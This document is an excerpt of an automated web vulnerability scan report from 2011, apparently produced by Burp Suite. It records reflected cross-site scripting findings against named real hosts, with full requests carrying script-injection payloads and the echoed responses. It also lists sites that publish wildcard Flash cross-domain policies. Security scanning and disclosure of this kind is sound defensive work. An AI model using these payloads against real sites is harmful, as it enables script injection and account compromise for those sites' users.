var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1 Host: da.newstogram.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19
The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:19 GMT Server: Apache Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/ Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/ Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly Content-Length: 2946
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1 Host: porscheusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Thu Feb 3 19:15:05 2011 Server: redirector/2.0 (Unix) Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2"> ...[SNIP]...
4.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://porscheusa.com
Path: /911GTS-mosaic
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1 Host: porscheusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Thu Feb 3 19:14:56 2011 Server: redirector/2.0 (Unix) Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1"> ...[SNIP]...
The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1 Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:23:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT" Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/ location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 Content-Length: 362 Connection: close Content-Type: application/x-javascript
SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script> ...[SNIP]...
The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1 Host: www.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:02:42 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET Content-Type: text/html; charset=iso-8859-1 Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1 Host: www.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:02:41 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET Content-Type: text/html; charset=iso-8859-1 Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...
5. Flash cross-domain policy
There are 45 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 18.xg4ken.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:42:55 GMT Server: Apache/2.0.52 (Red Hat) Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT ETag: "3a4007-c6-47b450a15bfc0" Accept-Ranges: bytes Content-Length: 198 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 220marketing9-px.rtrk.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:08:25 GMT Server: Apache Set-Cookie: RlocalUID=tc%3D11020308082556862; domain=.rtrk.com; path=/ Last-Modified: Sat, 09 May 2009 00:14:34 GMT ETag: "cc-4696fa1390e80" Accept-Ranges: bytes Content-Length: 204 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 69.16.184.135
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 18:52:09 GMT Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Accept-Ranges: none Expires: Thu, 03 Feb 2011 19:52:09 GMT Content-Length: 217 Content-Type: text/xml X-HW: 1296759129.cc031d1
<?xml version="1.0"?> <cross-domain-policy> <!-- This is a master-policy file --> <site-control permitted-cross-domain-policies="all" /> <allow-access-from domain="*" to-ports="80" /> </cross ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.rfihub.com
Response
HTTP/1.1 200 OK P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/xml; charset=iso-8859-1 Content-Length: 199 Connection: keep-alive
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.tribalfusion.com
Response
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.br.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: admin.brightcove.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753" Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT Accept-Ranges: bytes Content-Length: 386 Content-Type: application/xml Cache-Control: max-age=1200 Date: Thu, 03 Feb 2011 18:53:04 GMT Connection: close
<?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: api.feedzilla.com Proxy-Connection: keep-alive Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT Accept-Ranges: bytes ETag: "54d96c63507bcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Date: Thu, 03 Feb 2011 16:01:12 GMT Content-Length: 293
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: beacon.afy11.net
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT Accept-Ranges: bytes ETag: "e732374a5649c71:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 13:42:57 GMT Connection: close Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c5.zedo.com
Response
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:04:15 GMT ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: application/xml Content-Length: 247 X-Varnish: 1047669310 Date: Thu, 03 Feb 2011 16:11:49 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c7.zedo.com
Response
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:04:15 GMT ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: application/xml Content-Length: 247 X-Varnish: 1575557626 Date: Thu, 03 Feb 2011 16:09:41 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a908de3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:06:48 GMT Connection: close Content-Length: 277
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: graph.facebook.com
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=2592000 Content-Type: application/xml Expires: Sat, 05 Mar 2011 16:15:09 GMT Connection: close Content-Length: 280
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: gsbmtg.rtrk.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:10:20 GMT Server: Apache Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT ETag: "cc-48103a373c180" Accept-Ranges: bytes Content-Length: 204 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: application/xml Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:39:12 GMT;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: i1.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/v/H9TrHLL-oTU&hl=en_US&fs=1&rel=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: lab.arc90.com
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Last-Modified: Sat, 02 Jan 2010 21:22:51 GMT ETag: "220281-8b-47c35173060c0" Content-Type: application/xml Content-Length: 139 Date: Thu, 03 Feb 2011 16:21:59 GMT X-Varnish: 1335021700 Age: 0 Via: 1.1 varnish Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: loga2.doubleverify.com
Response
HTTP/1.1 200 OK Content-Length: 378 Content-Type: text/xml Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT Accept-Ranges: bytes ETag: "0ccdbb4d97ca1:9f7" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:07:01 GMT Connection: close
...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: motifcdn2.doubleclick.net
Response
HTTP/1.0 200 OK Server: Apache ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852" Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT Content-Type: application/xml Date: Thu, 03 Feb 2011 16:07:22 GMT Content-Length: 339 Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
